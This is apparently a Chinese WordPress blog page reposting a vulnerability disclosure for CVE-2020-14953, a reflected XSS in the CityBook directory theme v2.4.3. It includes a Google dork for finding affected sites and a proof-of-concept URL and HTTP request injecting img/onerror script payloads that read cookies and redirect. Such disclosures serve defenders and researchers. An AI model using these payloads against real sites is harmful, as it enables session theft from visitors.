WordPress极简博客 WordPress极简博客
  • 新鲜事
  • 战疫情
  • UI素材
    • UI素材
    • 电商/节日
    • PPT
      • 节日庆典
      • 工作汇报
      • 商业计划书
    • word
      • 简历竞聘
      • 合同/公文
  • 创客头条
    • 音乐分享
    • 初创文章
    • 极客头条
    • 生活趣事
    • 生活日记
    • 防骗指南
  • 编程教学
    • API日记
    • Linux安全栏目
      • Linux运维安全汇总
      • DDOS攻击防护
      • XSS攻击防护
      • SQL安全防护
    • Python技术栏目
      • Python基础入门
      • Python基础结构
    • WordPress技术栏目
      • WP主题
      • WordPress技术教程
      • RIPRO主题美化
    • WordPress漏洞发布
    • 技术教程汇总
    • 严选源码
  • 专题
  • 基友
  • 隐私
  • 注册
    登录
立即登录
  • 首页
  • 云优化
  • 新疫情
  • 新鲜事
    • 热文
    • 极客
    • 生活
  • 技术篇
    • WP主题
    • 技术教程
    • Python入门
    • Python基础
  • 专题篇
  • 友链君
首页 WordPress漏洞发布 CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS - CXSecurity.com

CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS - CXSecurity.com

夏柔 6月 25, 2020
漏洞ID11586漏洞类型
发布时间2020-06-22更新时间2020-06-25
CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS - CXSecurity.com-WordPress极简博客CVE编号CVE-2020-14953CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS - CXSecurity.com-WordPress极简博客CNNVD-IDN/A
漏洞平台N/ACVSS评分N/A

漏洞来源

CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS
官方跳转

漏洞详情

尚未纰漏

漏洞EXP
[+] Exploit Title: CityBook - Directory & Listing WordPress Theme v2.4.3 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/citybook/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 2.4.3
[+] Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14953
[+] CWE: CWE-79



### [ PoC: ]

[!] https://citybook2.cththemes.com/?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&lcats[]=47

[!] GET /?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&lcats[]=47 HTTP/1.1
Host: citybook2.cththemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
#CVE
0
J2dcg1.png
猜你喜欢
  • WordPress NAB Transact WooCommerce 2.1.0 Payment Bypass
  • WordPress quiz-master-next 安全漏洞
  • Nova Lite theme 跨站脚本漏洞
  • WordPress Email Subscribers & Newsletters 信息泄露漏洞
  • WordPress SeedProd coming-soon 跨站脚本漏洞
  • WordPress Social Sharing 跨站请求伪造漏洞
  • WordPress WooCommerce Subscriptions 跨站脚本漏洞
  • WordPress TC Custom JavaScript插件跨站脚本漏洞
  • WordPress Email Subscribers & Newsletters SQL注入漏洞
  • WordPress Email Subscribers & Newsletters 跨站请求伪造漏洞
14 5月, 2020
判断当前页面是 WordPress 的登录页
夏柔
站长
夏山如碧 - 怀柔天下
1700
文章
25
评论
58145K
获赞
版权声明

文章采用创作共用版权 CC BY-NC-ND/2.5/CN 许可协议,与本站观点无关。

如果您认为本文侵犯了您的版权信息,请与我们联系修正或删除。
投诉邮箱wpsite@aliyun.com

栏目推荐
Python基础入门33
WordPress技术教程267
前沿技术情报所22
城市创新——新消费11
最近有哪些不可错过的热文23
程序员的养生之道0
节
春
  • 新鲜事
  • 疫情实况
  • UI素材
  • 技术教程
  • 音乐分享
  • 专题
  • 友情
  • 隐私
  • 云优化
Copyright © 2019-2025 WordPress极简博客. Designed by 夏柔. 辽公网安备21010502000474号 辽ICP备19017037号-2